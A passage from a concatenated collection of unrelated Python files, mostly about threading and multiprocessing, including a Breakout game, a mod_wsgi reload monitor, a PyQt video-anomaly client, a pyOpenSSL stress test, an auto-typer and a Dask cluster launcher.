def _get_custom_port_range(self):
port_range = click.prompt('Please select a range of ports (separated by a comma)', type=str)
port_range = port_range.replace(' ', '').split(',')
port_range = tuple(filter(str, port_range))
try:
port_range = tuple(map(int, port_range))
if len(port_range) < 2:
sys.exit(f'[Error]: Port range should be TWO numbers, separated by a comma. You provided {port_range}')
except ValueError:
sys.exit(f'[Error]: Illegal value for port range, you provided {port_range}')
else:
if port_range[0] > port_range[1]:
sys.exit(f'[Error]: Start port cannot be bigger than the last port. You provided {port_range}')
return port_range
@property
def total_ports_scanned(self):
return len(self.open_ports + self.closed_ports)
|
game.py
|
from random import *
import common as var
import blocks as bs
from graphics import *
import threading
from sound import *
def movePlayer(win, key, player, speed):
if key == 'Left' and player.getAnchor().getX() > 50:
player.move(-speed, 0)
if key == 'Right' and player.getAnchor().getX() < 550:
player.move(speed, 0)
def startBall():
return randint(0, 1)
def checkCollisions(win, dir, gameVariables, rad):
d = ["LU", "RU", "RD", "LD"]
ballX = gameVariables[var.ball].getCenter().getX()
ballY = gameVariables[var.ball].getCenter().getY()
playerX = gameVariables[var.player].getAnchor().getX()
playerY = gameVariables[var.player].getAnchor().getY()
'''Collisions with the boundaries of the play area'''
if d[dir] == "LU" and ballX - rad <= 0:
dir = changeDirection('+', dir)
if d[dir] == "LU" and ballY - rad <= 0:
dir = changeDirection('-', dir)
if d[dir] == "RU" and ballX + rad >= 600:
dir = changeDirection('-', dir)
if d[dir] == "RU" and ballY - rad <= 0:
dir = changeDirection('+', dir)
if d[dir] == "RD" and ballX + rad >= 600:
dir = changeDirection('+', dir)
if d[dir] == "RD" and ballY + rad >= 790:
return -1
if d[dir] == "LD" and ballX - rad <= 0:
dir = changeDirection('-', dir)
if d[dir] == "LD" and ballY + rad >= 790:
return -1
'''Collisions with the paddle'''
if d[dir] == "RD":
if ballY + rad >= playerY - (var.playerHeight /2) and ballY + rad <= playerY + (var.playerHeight /2):
if ballX + rad >= playerX - (var.playerLength /2) and ballX + rad <= playerX + (var.playerLength /2):
thread = threading.Thread(target=playPaddleSound)
thread.start() #Sound of ball hitting the paddle
dir = changeDirection('-', dir)
if d[dir] == "LD":
if ballY + rad >= playerY - (var.playerHeight /2) and ballY + rad <= playerY + (var.playerHeight /2):
if ballX + rad >= playerX - (var.playerLength /2) and ballX + rad <= playerX + (var.playerLength /2):
thread = threading.Thread(target=playPaddleSound)
thread.start() #Sound of ball hitting the paddle
dir = changeDirection('+', dir)
'''Collisions with individual blocks'''
aux = 0
for b in gameVariables[var.blocks]:
if d[dir] == "LU" or d[dir] == "LD":
bX = b.getP2().getX()
bY = b.getP2().getY()
else:
bX = b.getP1().getX()
bY = b.getP1().getY()
if d[dir] == "LU": #DONE
if ballX <= bX and ballX >= bX - var.block_width:
if ballY - rad <= bY and ballY - rad >= bY - rad:
dir = changeDirection('-', dir)
bs.addPoints(win, aux, gameVariables)
bs.removeBlock(aux, gameVariables)
break
if ballX - rad <= bX and ballX - rad >= bX - rad:
if ballY <= bY and ballY >= bY - var.block_height:
dir = changeDirection('+', dir)
bs.addPoints(win, aux, gameVariables)
bs.removeBlock(aux, gameVariables)
break
if d[dir] == "RU": #DONE
if ballX >= bX and ballX <= bX + var.block_width:
if ballY - rad <= bY + var.block_height and ballY - rad >= (bY + var.block_height) - rad:
dir = changeDirection('+', dir)
bs.addPoints(win, aux, gameVariables)
bs.removeBlock(aux, gameVariables)
break
if ballX + rad >= bX and ballX + rad <= bX + rad:
if ballY >= bY and ballY <= bY + var.block_height:
dir = changeDirection('-', dir)
bs.addPoints(win, aux, gameVariables)
bs.removeBlock(aux, gameVariables)
break
if d[dir] == "RD": #DONE
if ballX >= bX and ballX <= bX + var.block_width:
if ballY + rad >= bY and ballY + rad <= bY + rad:
dir = changeDirection('-', dir)
bs.addPoints(win, aux, gameVariables)
bs.removeBlock(aux, gameVariables)
break
if ballX + rad >= bX and ballX + rad <= bX + rad:
if ballY >= bY and ballY <= bY + var.block_height:
dir = changeDirection('+', dir)
bs.addPoints(win, aux, gameVariables)
bs.removeBlock(aux, gameVariables)
break
if d[dir] == "LD": #DONE
if ballX <= bX and ballX >= (bX - var.block_width):
if ballY + rad >= bY - var.block_height and ballY + rad <= (bY - var.block_height) + rad:
dir = changeDirection('+', dir)
bs.addPoints(win, aux, gameVariables)
bs.removeBlock(aux, gameVariables)
break
if ballX - rad <= bX and ballX - rad >= bX - rad:
if ballY <= bY and ballY >= bY - var.block_height:
dir = changeDirection('-', dir)
bs.addPoints(win, aux, gameVariables)
bs.removeBlock(aux, gameVariables)
break
aux += 1
return dir
def changeDirection(rate, dir):
if rate == '-':
dir -= 1
else:
dir += 1
if dir < 0:
return 3
if dir > 3:
return 0
return dir
def moveBall(dir, speed, gameVariables):
directions = ["LU", "RU", "RD", "LD"]
if directions[dir] == "LU":
gameVariables[var.ball].move(-speed, -speed)
if directions[dir] == "RU":
gameVariables[var.ball].move(speed, -speed)
if directions[dir] == "RD":
gameVariables[var.ball].move(speed, speed)
if directions[dir] == "LD":
gameVariables[var.ball].move(-speed, speed)
def showPause(win):
menu = Image(Point(300, 400), "../resources/pause_menu.gif")
menu.draw(win)
return menu
def closePause(menu):
menu.undraw()
def resumeButton(mouse):
if mouse != None:
if mouse.getX() >= 196 and mouse.getX() <= 396:
if mouse.getY() >= 390 and mouse.getY() <= 450:
return True
else:
return False
else:
return False
def mainMenuButton(mouse):
if mouse != None:
if mouse.getX() >= 196 and mouse.getX() <= 396:
if mouse.getY() >= 470 and mouse.getY() <= 525:
return True
else:
return False
else:
return False
|
web_monitor.py
|
"""
Monitor files and kill mod_wsgi processes if any files change
Details here -- http://code.google.com/p/modwsgi/wiki/ReloadingSourceCode#Restarting_Daemon_Processes
Added the ability to track directories
"""
import os
import sys
import time
import signal
import threading
import atexit
import Queue
_interval = 1.0
_times = {}
_files = []
_running = False
_queue = Queue.Queue()
_lock = threading.Lock()
def _restart(path):
_queue.put(True)
prefix = 'monitor (pid=%d):' % os.getpid()
print >> sys.stderr, '%s Change detected to \'%s\'.' % (prefix, path)
print >> sys.stderr, '%s Triggering process restart.' % prefix
os.kill(os.getpid(), signal.SIGINT)
def _modified(path):
try:
# If path doesn't denote a file and were previously
# tracking it, then it has been removed or the file type
# has changed so force a restart. If not previously
# tracking the file then we can ignore it as probably
# pseudo reference such as when file extracted from a
# collection of modules contained in a zip file.
if not os.path.isfile(path):
return path in _times
# Check for when file last modified.
mtime = os.stat(path).st_mtime
if path not in _times:
_times[path] = mtime
# Force restart when modification time has changed, even
# if time now older, as that could indicate older file
# has been restored.
if mtime != _times[path]:
return True
except:
# If any exception occured, likely that file has been
# been removed just before stat(), so force a restart.
return True
return False
def _monitor():
while 1:
# Check modification times on all files in sys.modules.
for module in sys.modules.values():
if not hasattr(module, '__file__'):
continue
path = getattr(module, '__file__')
if not path:
continue
if os.path.splitext(path)[1] in ['.pyc', '.pyo', '.pyd']:
path = path[:-1]
if _modified(path):
return _restart(path)
# Check modification times on files which have
# specifically been registered for monitoring.
for path in _files:
if _modified(path):
return _restart(path)
# Go to sleep for specified interval.
try:
return _queue.get(timeout=_interval)
except:
pass
_thread = threading.Thread(target=_monitor)
_thread.setDaemon(True)
def _exiting():
try:
_queue.put(True)
except:
pass
_thread.join()
atexit.register(_exiting)
def _get_files_from_dir(dir):
basedir = dir
subdirlist = []
for item in os.listdir(dir):
item_full_path = os.path.join(basedir, item)
if os.path.isfile(item_full_path):
if not item_full_path in _files:
_files.append(item_full_path)
else:
subdirlist.append(item_full_path)
for subdir in subdirlist:
_get_files_from_dir(subdir)
def track(path):
if os.path.isfile(path):
if not path in _files:
_files.append(path)
else:
_get_files_from_dir(path)
def start(interval=1.0):
global _interval
if interval < _interval:
_interval = interval
global _running
_lock.acquire()
if not _running:
prefix = 'monitor (pid=%d):' % os.getpid()
print >> sys.stderr, '%s Starting change monitor.' % prefix
_running = True
_thread.start()
_lock.release()
|
monitor.py
|
# coding:utf-8
# 2018.3.5
from PyQt4.QtGui import *
from PyQt4.QtCore import *
from pojo import POJO
import os
import utils
import cv2
import socket
import numpy as np
from configuration import ConfigInjection
from threading import Event, Thread
import time
from caculate_handler import CaculateHandler
try:
_fromUtf8 = QString.fromUtf8
except AttributeError:
def _fromUtf8(s):
return s
try:
_encoding = QApplication.UnicodeUTF8
def _translate(context, text, disambig):
return QApplication.translate(context, text, disambig, _encoding)
except AttributeError:
def _translate(context, text, disambig):
return QApplication.translate(context, text, disambig)
# 用于控制处理流程,获取到_windowdow的一个实例以控制
class MonitorController():
def __init__(self, _window):
self._window = _window
self._window.connect(self._window.start, SIGNAL("clicked()"), self.start_spy)
self._window.connect(self._window.logout, SIGNAL("clicked()"), self.close_window)
self.load_config() # 加载配置文件
self.load_socket_config()
self._cap = cv2.VideoCapture(self.streamAddr) # self.config.streamAddr
self._abnormal_type = ["\n明火识别", "\n煤粉、煤灰\n 或粉尘识别", "\n液体(水、油) \n识别", "\n气体、蒸汽 \n识别", "\n无异常"]
self._abnormal_index = 4
self._main_timer = QTimer()
self._main_timer.timeout.connect(self.monitor) # slot 与槽链接(main)
self._warning_timer = QTimer()
self._warning_timer.timeout.connect(self.warning) # 预警闪烁功能
self._abnormal_labels = [self._window.ablabel1, self._window.ablabel2] # 异常图片显示框初始化
self._abnormal_pics = [None, None] # 异常图片对象初始化
self.ABSPATH = str(os.getcwd())
self._pic_save_path = os.path.join(self.ABSPATH, 'save')
if not os.path.exists(self._pic_save_path):
os.mkdir(self._pic_save_path)
self.eles_init()
self._notify_event = Event()
self._send_thread = Thread(target=self.send_msg)
self._send_thread.setDaemon(True)
self._send_thread.start()
# 执行程序的主入口
def start_spy(self):
self._main_timer.start(40)
if self._click_flag:
self._window.start.setText(_translate("Form", "Pause", None))
self._click_flag = not self._click_flag
else:
self._window.start.setText(_translate("Form", "Start", None))
self._click_flag = not self._click_flag
self._main_timer.stop()
def monitor(self):
success, image = self.cap.read()
if not self.cap.isOpened():
self.cap = cv2.Videocapture(self.streamAddr)
success, image = self.cap.read()
if image != None:
image_copy = image.copy()
image = cv2.cvtColor(image, cv2.COLOR_BGR2RGB)
if success:
self._cnt += 1
if self._cnt == 10:
self._handler.baseImg.append(image_copy)
self._handler.add_diff_value(image_copy)
# self._handler.add_candidate_img(image_copy)
# cv2.rectangle(image, (480, 360), (1440, 900), (255, 0, 0))
show_img = QImage(image.data, image.shape[1], image.shape[0], QImage.Format_RGB888)
photo = QPixmap.fromImage(show_img)
self._images.append(photo)
n = len(self._images)
if n >= 9:
tmp = self._images[n - 9:n] # 优化缓存qpixmap的list
del self._images
self._images = tmp
if len(self._images) >= 9:
flag, self._abnormal_rois ,self._draw_index= self._handler.hasAbnormal()
if flag or self._is_real_normal:
if self._cnt_flag < 8:
self._handler.check_bg(image_copy)
self._is_real_normal = True
self._cnt_flag += 1
else:
self._is_real_normal = False
print "现在可能有异常了,前面的处理完了没--"
ab_pixmap = self._images[4]
updated_candidate = self._handler.img_to_candidate()
self._cnt_flag = 0
if self._step2_processed: # second process finish
print "可以处理新的数据了--------"
if self._handler.candidate_valid():
self._step2_processed = False
if updated_candidate:
self._handler.saveImg(self._cnt)
self._buffers[0] = POJO(ab_pixmap, self._handler.get_candidate())
self._notify_event.set()
else:
print "没有被判定可用的图像--"
else:
print "还没处理完,你再等会儿----"
utils.set_label_pic(self._window.video, photo)
if self._updated_abnormal_pic:
self._updated_abnormal_pic = False
self.update_show()
else:
self._warning_timer.stop()
else:
self.cap.release()
def load_config(self):
self.config = configInjection() # 加载配置文件获取流地址==
self.config.load_configuration()
self.streamAddr = self.config.streamAddr
def load_socket_config(self):
address = (self.config.address, self.config.port)
self.sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self.sock.connect(address)
# 更新异常图片显示
def update_show(self):
for i in range(2):
if self._abnormal_pics[i] != None:
utils.set_label_pic(self._abnormal_labels[i], self._abnormal_pics[i])
# 更新文本显示self._window.ablabel3
self._window.ablabel3.setText(_translate("Form",
self._abnormal_type[self._abnormal_index], None))
# self._warning_timer.start(500)
# 一些成员变量初始化设置
def eles_init(self):
self._images = []
self._step2_processed = True # 第二步做完的标志
self._pojo_changed = False
self._click_flag = False # 用于改变开始键的文本变化
self._vals = [] # 用于存储每张图片处理输出值
self._buffers = []
self._buffers.append(None)
self._handler = CaculateHandler(self.config) # 第一步图像处理器对象
self._cnt = 0
self._abnormal_rois = None
self._updated_abnormal_pic = False
self._is_real_normal = False
self._cnt_flag = 0
self._draw_index = 0
def warning(self):
if self._window.ablabel3.styleSheet().isEmpty():
self._window.ablabel3.setStyleSheet(_fromUtf8("border:5px solid red;"))
else:
self._window.ablabel3.setStyleSheet(_fromUtf8(""))
def send_msg(self):
while True:
self._notify_event.wait()
print "我要开始处理啦-----"
self._pojo_changed = False
self._save_obj = self._buffers[0]
# 向服务器端发送图片
encode_param = [int(cv2.IMWRITE_JPEG_QUALITY), 90]
result, img_encode = cv2.imencode('.jpg', self._save_obj.img, encode_param)
data = np.array(img_encode)
send_data = data.tostring()
self.sock.send(str(len(send_data)).ljust(16))
self.sock.send(send_data)
# 发送相应的问题roi区域标记
if len(self._abnormal_rois) == 0:
for j in range(16):
self._abnormal_rois.append(j)
list = [str(i) for i in self._abnormal_rois]
tmp_str = ",".join(list) # "1,2,3,4"
self.sock.sendall(str(len(tmp_str)).ljust(16))
self.sock.send(tmp_str)
self.rece_msg()
print "数据发送失败,请重新开始发送"
self.sock.close()
def rece_msg(self):
ss = self.sock.recv(32)
print "返回的结果---", ss
rec_data=str(ss).split("/")
index = int(rec_data[1])
if 4 != index:
self._abnormal_index = index
#utils.update_list(self._abnormal_pics, self._save_obj.ab_pixmap) # 更新异常列表
draws = rec_data[2:]
draws = [int(i) for i in draws]
print "需要画出的区域有--",draws
utils.update_list(self._abnormal_pics, self._handler.recs_draw(draws,self._save_obj.img))
self._updated_abnormal_pic = True
else:
self._updated_abnormal_pic = False
self._step2_processed = True
self._notify_event.clear()
def checkIsBackGround(self):
self._handler.check_bg()
self.postImgs = []
# window close
def close_window(self):
self.sock.close()
self._main_timer.stop()
self._window.close()
|
time.py
|
#!/usr/bin/env python3
import redis
import time
import os
import argparse
import threading
from flask_socketio import SocketIO
from flask import Flask, render_template, session, request, \
copy_current_request_context
args = None
r = None
th = None
app = Flask(__name__)
@app.route('/')
def index():
host = request.host.split(':')[0]
return render_template('time.html', scheme=request.scheme, host=host)
def sysinfo():
socketio = SocketIO(message_queue=args.redis)
while True:
data = {
'time': int(time.time())
}
socketio.emit('update', data, room='time')
time.sleep(1)
def main():
global args, r, th
def_redis = 'redis://'
def_path = '/tmp'
def_address = 'localhost:7788'
def_redis = os.getenv('REDIS') or 'redis://localhost:6379/0'
parser = argparse.ArgumentParser(description='time ws-emit demo')
parser.add_argument('-v', dest='verbose', action='store_true',
default=False, help='verbose mode')
parser.add_argument('--redis', default=def_redis,
help=f'redis URL. Def: {def_redis}')
parser.add_argument('-a', '--address', default=def_address,
help=f'bind to this Address. Def: {def_address}')
args = parser.parse_args()
r = redis.Redis.from_url(args.redis)
th = threading.Thread(target=sysinfo, args=())
th.daemon = True
th.start()
addr = args.address.split(':')
app.run(host=addr[0], port=int(addr[1]))
main()
|
context-passphrase-callback.py
|
# Copyright (C) Jean-Paul Calderone
# See LICENSE for details.
#
# Stress tester for thread-related bugs in global_passphrase_callback in
# src/ssl/context.c. In 0.7 and earlier, this will somewhat reliably
# segfault or abort after a few dozen to a few thousand iterations on an SMP
# machine (generally not on a UP machine) due to uses of Python/C API
# without holding the GIL.
from itertools import count
from threading import Thread
from OpenSSL.SSL import Context, TLSv1_METHOD
from OpenSSL.crypto import TYPE_RSA, FILETYPE_PEM, PKey, dump_privatekey
k = PKey()
k.generate_key(TYPE_RSA, 128)
file('pkey.pem', 'w').write(dump_privatekey(FILETYPE_PEM, k, "blowfish", "foobar"))
count = count()
def go():
def cb(a, b, c):
print count.next()
return "foobar"
c = Context(TLSv1_METHOD)
c.set_passwd_cb(cb)
while 1:
c.use_privatekey_file('pkey.pem')
threads = [Thread(target=go, args=()) for i in xrange(2)]
for th in threads:
th.start()
for th in threads:
th.join()
|
autoTyperGUI.py
|
#!/bin/python3
import tkinter as tk
import tkinter.scrolledtext as scrolledtext
from tkinter import messagebox
import webbrowser
import time
import multiprocessing
import sys
def typing(delay, interval, data):
delay = int(delay)
time.sleep(delay)
import pyautogui
pyautogui.FAILSAFE = False
pyautogui.write(data, interval=interval)
def start_typing():
global t1
t1 = multiprocessing.Process(target=typing, args=(ent_delay.get(), ent_interval.get(), txt_box.get("1.0", tk.END)))
t1.start()
messagebox.showinfo("Message", "Click on the Window where you want text to be typed.")
def stop_typing():
t1.terminate()
t1.join()
sys.stdout.flush()
global i
def exit_program():
sys.exit()
def select_all(event):
txt_box.tag_add(tk.SEL, "1.0", tk.END)
txt_box.mark_set(tk.INSERT, "1.0")
txt_box.see(tk.INSERT)
return 'break'
def callback(url):
webbrowser.open_new(url)
def create_about_window():
about_window = tk.Toplevel(window)
about_window.title("About")
lbl_name = tk.Label(text="Version - Auto Typer 1.0", master=about_window, font='Helvetica 15')
lbl_name.grid(row=0, column=0, pady=(15,5), padx=10)
lbl_developer = tk.Label(text="Developer - Parvesh Monu", master=about_window, font='Helvetica 10')
lbl_developer.grid(row=1, column=0, pady=5, padx=10)
lbl_twitter = tk.Label(text="Follow - https://twitter.com/parveshmonu", master=about_window, font='Helvetica 10', fg="blue", cursor="hand2")
lbl_twitter.grid(row=2, column=0, pady=5, padx=10)
lbl_twitter.bind("<Button-1>", lambda e: callback("https://twitter.com/parveshmonu"))
lbl_github = tk.Label(text="Github - https://github.com/Parveshdhull", master=about_window, font='Helvetica 10', fg="blue", cursor="hand2")
lbl_github.grid(row=3, column=0, pady=5, padx=10,)
lbl_github.bind("<Button-1>", lambda e: callback("https://github.com/Parveshdhull"))
lbl_youtube= tk.Label(text="YouTube - https://youtube.com/right2trick", master=about_window, font='Helvetica 10', fg="blue", cursor="hand2")
lbl_youtube.grid(row=4, column=0, pady=10, padx=10,)
lbl_youtube.bind("<Button-1>", lambda e: callback("https://youtube.com/right2trick"))
buy_coffee = tk.Button(text="Buy me a coffee", master=about_window)
buy_coffee.grid(row=5,column=0, padx=10, pady=(10,20))
buy_coffee.bind("<Button-1>", lambda e: callback("https://www.buymeacoffee.com/parveshmonu"))
about_window.mainloop()
def configure_weight():
# frm_params
frm_params.columnconfigure(0, weight=1)
frm_params.columnconfigure(1, weight=1)
frm_params.rowconfigure(0, weight=1)
frm_params.rowconfigure(1, weight=1)
# frm_buttons
frm_buttons.columnconfigure(0, weight=1)
frm_buttons.columnconfigure(1, weight=1)
frm_buttons.columnconfigure(2, weight=1)
frm_buttons.rowconfigure(0, weight=1)
# main window
window.columnconfigure(0, weight=1)
window.rowconfigure(0, weight=1)
window.rowconfigure(1, weight=1)
window.rowconfigure(2, weight=1)
window.rowconfigure(3, weight=1)
window.rowconfigure(4, weight=1)
def create_main_window():
window.title("Auto Typer")
# Params Frame
global frm_params
frm_params = tk.Frame()
frm_params.grid(row=0,column=0)
# Delay
lbl_delay = tk.Label(text="Inital Delay (In Sec)", master=frm_params)
lbl_delay.grid(row=0,column=0, padx=50, pady=5)
global ent_delay
ent_delay = tk.Entry(justify='center', master=frm_params)
ent_delay.insert(0, "10")
ent_delay.grid(row=1,column=0, padx=50)
# Interval
lbl_interval = tk.Label(text="Interval (In Sec)", master=frm_params)
lbl_interval.grid(row=0,column=1, padx=50, pady=5)
global ent_interval
ent_interval = tk.Entry(justify='center', master=frm_params)
ent_interval.insert(0, "0.07")
ent_interval.grid(row=1,column=1, padx=50)
# Data
lbl_data = tk.Label(text="Paste Text Here", font='Helvetica 18 bold' )
lbl_data.grid(row=3,column=0, pady=(10,2))
global txt_box
txt_box = scrolledtext.ScrolledText(window, undo=True)
txt_box.grid(row=4,column=0)
txt_box.bind("<Control-Key-a>", select_all)
txt_box.bind("<Control-Key-A>", select_all)
# Buttons Frame
global frm_buttons
frm_buttons = tk.Frame()
frm_buttons.grid(row=5,column=0)
# Start
start = tk.Button(text="Start", master=frm_buttons, command=start_typing)
start.grid(row=0,column=0, padx=10, pady=10)
# Stop
start = tk.Button(text="Stop", master=frm_buttons, command=stop_typing)
start.grid(row=0,column=1, padx=10, pady=10)
# Exit
start = tk.Button(text="Exit", master=frm_buttons, command=exit_program)
start.grid(row=0,column=2, padx=10, pady=10)
# About
start = tk.Button(text="About", command=create_about_window)
start.grid(row=6,column=0, padx=10, pady=10)
configure_weight()
window.mainloop()
if __name__ == '__main__':
multiprocessing.freeze_support()
window = tk.Tk()
create_main_window()
|
synchronization_between_processes.py
|
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
__author__ = 'ipetrash'
# SOURCE: https://docs.python.org/3.6/library/multiprocessing.html#synchronization-between-processes
from multiprocessing import Process, Lock
import time
def f(lock, i):
with lock:
print('hello world', i)
time.sleep(1)
if __name__ == '__main__':
lock = Lock()
for num in range(10):
Process(target=f, args=(lock, num)).start()
|
startDask.py
|
import os
import argparse
import time
from dask.distributed import Client
import sys, uuid
import threading
import subprocess
import socket
import mlflow
from notebook.notebookapp import list_running_servers
def flush(proc, proc_log):
while True:
proc_out = proc.stdout.readline()
if proc_out == "" and proc.poll() is not None:
proc_log.close()
break
elif proc_out:
sys.stdout.write(proc_out)
proc_log.write(proc_out)
proc_log.flush()
if __name__ == "__main__":
parser = argparse.ArgumentParser()
parser.add_argument("--jupyter_token", default=uuid.uuid1().hex)
parser.add_argument("--script")
args, unparsed = parser.parse_known_args()
for k, v in os.environ.items():
if k.startswith("MLFLOW"):
print(k, v)
MLFLOW_RUN_ID = os.getenv("MLFLOW_RUN_ID")
print(
"- env: AZ_BATCHAI_JOB_MASTER_NODE_IP: ",
os.environ.get("AZ_BATCHAI_JOB_MASTER_NODE_IP"),
)
print(
"- env: AZ_BATCHAI_IS_CURRENT_NODE_MASTER: ",
os.environ.get("AZ_BATCHAI_IS_CURRENT_NODE_MASTER"),
)
print("- env: AZ_BATCHAI_NODE_IP: ", os.environ.get("AZ_BATCHAI_NODE_IP"))
print("- env: AZ_BATCH_HOST_LIST: ", os.environ.get("AZ_BATCH_HOST_LIST"))
print("- env: AZ_BATCH_NODE_LIST: ", os.environ.get("AZ_BATCH_NODE_LIST"))
print("- env: MASTER_ADDR: ", os.environ.get("MASTER_ADDR"))
print("- env: MASTER_PORT: ", os.environ.get("MASTER_PORT"))
print("- env: RANK: ", os.environ.get("RANK"))
print("- env: LOCAL_RANK: ", os.environ.get("LOCAL_RANK"))
print("- env: NODE_RANK: ", os.environ.get("NODE_RANK"))
print("- env: WORLD_SIZE: ", os.environ.get("WORLD_SIZE"))
rank = os.environ.get("RANK")
ip = socket.gethostbyname(socket.gethostname())
master = os.environ.get("MASTER_ADDR")
master_port = os.environ.get("MASTER_PORT")
print("- my rank is ", rank)
print("- my ip is ", ip)
print("- master is ", master)
print("- master port is ", master_port)
scheduler = master + ":8786"
dashboard = master + ":8787"
print("- scheduler is ", scheduler)
print("- dashboard is ", dashboard)
print("args: ", args)
print("unparsed: ", unparsed)
print("- my rank is ", rank)
print("- my ip is ", ip)
if not os.path.exists("logs"):
os.makedirs("logs")
print("free disk space on /tmp")
os.system(f"df -P /tmp")
if str(rank) == "0":
mlflow.log_param("headnode", ip)
mlflow.log_param(
"cluster",
"scheduler: {scheduler}, dashboard: {dashboard}".format(
scheduler=scheduler, dashboard=dashboard
),
)
cmd = (
"jupyter lab --ip 0.0.0.0 --port 8888"
+ " --NotebookApp.token={token}"
+ " --allow-root --no-browser"
).format(token=args.jupyter_token)
os.environ["MLFLOW_RUN_ID"] = MLFLOW_RUN_ID
jupyter_log = open("logs/jupyter_log.txt", "w")
jupyter_proc = subprocess.Popen(
cmd.split(),
universal_newlines=True,
stdout=subprocess.PIPE,
stderr=subprocess.STDOUT,
)
jupyter_flush = threading.Thread(target=flush, args=(jupyter_proc, jupyter_log))
jupyter_flush.start()
# while not list(list_running_servers()):
# time.sleep(5)
# jupyter_servers = list(list_running_servers())
# assert (len(jupyter_servers) == 1), "more than one jupyter server is running"
mlflow.log_param(
"jupyter", "ip: {ip_addr}, port: {port}".format(ip_addr=ip, port="8888")
)
mlflow.log_param("jupyter-token", args.jupyter_token)
cmd = (
"dask-scheduler "
+ "--port "
+ scheduler.split(":")[1]
+ " --dashboard-address "
+ dashboard
)
print(cmd)
os.environ["MLFLOW_RUN_ID"] = MLFLOW_RUN_ID
scheduler_log = open("logs/scheduler_log.txt", "w")
scheduler_proc = subprocess.Popen(
cmd.split(),
universal_newlines=True,
stdout=subprocess.PIPE,
stderr=subprocess.STDOUT,
)
scheduler_flush = threading.Thread(
target=flush, args=(scheduler_proc, scheduler_log)
)
scheduler_flush.start()
cmd = "dask-worker " + scheduler
print(cmd)
os.environ["MLFLOW_RUN_ID"] = MLFLOW_RUN_ID
worker_log = open("logs/worker_{rank}_log.txt".format(rank=rank), "w")
worker_proc = subprocess.Popen(
cmd.split(),
universal_newlines=True,
stdout=subprocess.PIPE,
stderr=subprocess.STDOUT,
)
worker_flush = threading.Thread(target=flush, args=(worker_proc, worker_log))
worker_flush.start()
if args.script:
command_line = " ".join(["python", args.script] + unparsed)
print("Launching:", command_line)
os.environ["MLFLOW_RUN_ID"] = MLFLOW_RUN_ID
driver_log = open("logs/driver_log.txt", "w")
driver_proc = subprocess.Popen(
command_line.split(),
universal_newlines=True,
stdout=subprocess.PIPE,
stderr=subprocess.STDOUT,
)
driver_flush = threading.Thread(
target=flush, args=(driver_proc, driver_log)
)
driver_flush.start()
# Wait until process terminates (without using p.wait())
# while driver_proc.poll() is None:
# # Process hasn't exited yet, let's wait some
# time.sleep(0.5)
print("waiting for driver process to terminate")
driver_proc.wait()
exit_code = driver_proc.returncode
print("process ended with code", exit_code)
print("killing scheduler, worker and jupyter")
jupyter_proc.kill()
scheduler_proc.kill()
worker_proc.kill()
exit(exit_code)
else:
flush(scheduler_proc, scheduler_log)
else:
cmd = "dask-worker " + scheduler
print(cmd)
os.environ["MLFLOW_RUN_ID"] = MLFLOW_RUN_ID
worker_log = open("logs/worker_{rank}_log.txt".format(rank=rank), "w")
worker_proc = subprocess.Popen(
cmd.split(),
universal_newlines=True,
stdout=subprocess.PIPE,
stderr=subprocess.STDOUT,
)
flush(worker_proc, worker_log)
|
server copy.py
|
from threading import Thread
import serial
import time
import collections
import matplotlib.pyplot as plt
import matplotlib.animation as animation
from matplotlib import colors
import struct
import copy
import pandas as pd
import numpy as np
from scipy import interpolate
import mido
class serialPlot:
def __init__(self, serialPort='COM6', serialBaud=9600, dataLength=100, dataNumBytes=2, numData=1):
self.port = serialPort
self.baud = serialBaud
self.plotMaxLength = dataLength
self.dataNumBytes = dataNumBytes
self.numData = numData
self.rawData = bytearray(numData * dataNumBytes)
self.dataType = None
self.midoOutports = mido.get_output_names()
print("Connecting to MIDI port:", self.midoOutports[1])
self.midiOutport = mido.open_output(self.midoOutports[1])
#[F2,G#2, C3, C#3, D#3, F3, G#3]
self.notes = [41, 44, 48, 49, 51, 53, 56]
self.note_status = [False, False, False, False, False, False, False]
if dataNumBytes == 2:
self.dataType = 'H' # 2 byte integer unsigned
elif dataNumBytes == 4:
self.dataType = 'F' # 4 byte float unsigned
self.data = []
for i in range(numData): # give an array for each type of data and store them in a list
self.data.append(collections.deque([0] * dataLength, maxlen=dataLength))
self.isRun = True
self.isReceiving = False
self.thread = None
self.plotTimer = 0
self.previousTimer = 0
# self.csvData = []
print('Trying to connect to: ' + str(serialPort) + ' at ' + str(serialBaud) + ' BAUD.')
try:
self.serialConnection = serial.Serial(serialPort, serialBaud, timeout=4)
print('Connected to ' + str(serialPort) + ' at ' + str(serialBaud) + ' BAUD.')
except:
print("Failed to connect with " + str(serialPort) + ' at ' + str(serialBaud) + ' BAUD.')
def readSerialStart(self):
if self.thread == None:
self.thread = Thread(target=self.backgroundThread)
self.thread.start()
# Block till we start receiving values
while self.isReceiving != True:
time.sleep(0.1)
def getSerialData(self, frame, ax, fig, figNumber, maxDataLength):
currentTimer = time.perf_counter()
self.plotTimer = int((currentTimer - self.previousTimer) * 1000) # the first reading will be erroneous
self.previousTimer = currentTimer
privateData = copy.deepcopy(self.rawData[:]) # so that the 3 values in our plots will be synchronized to the same sample time
# unpack and decode incoming data and add to variable data
for i in range(self.numData):
data = privateData[(i*self.dataNumBytes):(self.dataNumBytes + i*self.dataNumBytes)]
value, = struct.unpack(self.dataType, data)
self.data[i].append(value) # we get the latest data point and append it to our array
# print("\r",self.data[1][-1],"\t",self.data[0][-1], end="")
self.azimut = np.asarray(self.data[1])*np.pi/180
self.radius = np.asarray(self.data[0])
if (figNumber == 1):
plt.figure(fig.number)
ax.clear()
# define binning: 0m to 4m with steps of 12.5cm (32 steps)
self.rbins = np.linspace(0,400, 40)
self.abins = np.linspace(-0.1,2*np.pi-0.1, 40)
self.hist, _ , _ = np.histogram2d(self.azimut, self.radius, bins=(self.abins, self.rbins), density=True)
self.A, self.R = np.meshgrid(self.abins, self.rbins)
self.pc = ax.pcolormesh(self.A, self.R, self.hist.T, cmap="magma")
# self.interp_hist = interpolate.interp2d(self.abins[:-1],self.rbins[:-1],self.hist.T,kind='linear')
# define interpolation binning
# self.rbins_interp = np.linspace(20,400, 40*4)
# self.abins_interp = np.linspace(0.0,2*np.pi, 40*4)
# self.A_interp, self.R_interp = np.meshgrid(self.abins_interp, self.rbins_interp)
# self.hist_interp = self.interp_hist(self.abins_interp,self.rbins_interp)
# self.pc = ax.pcolormesh(self.A_interp, self.R_interp, self.hist_interp, cmap="magma")
# ax.set_rmax(400)
ax.set_rorigin(20)
if (figNumber == 2):
plt.figure(fig.number)
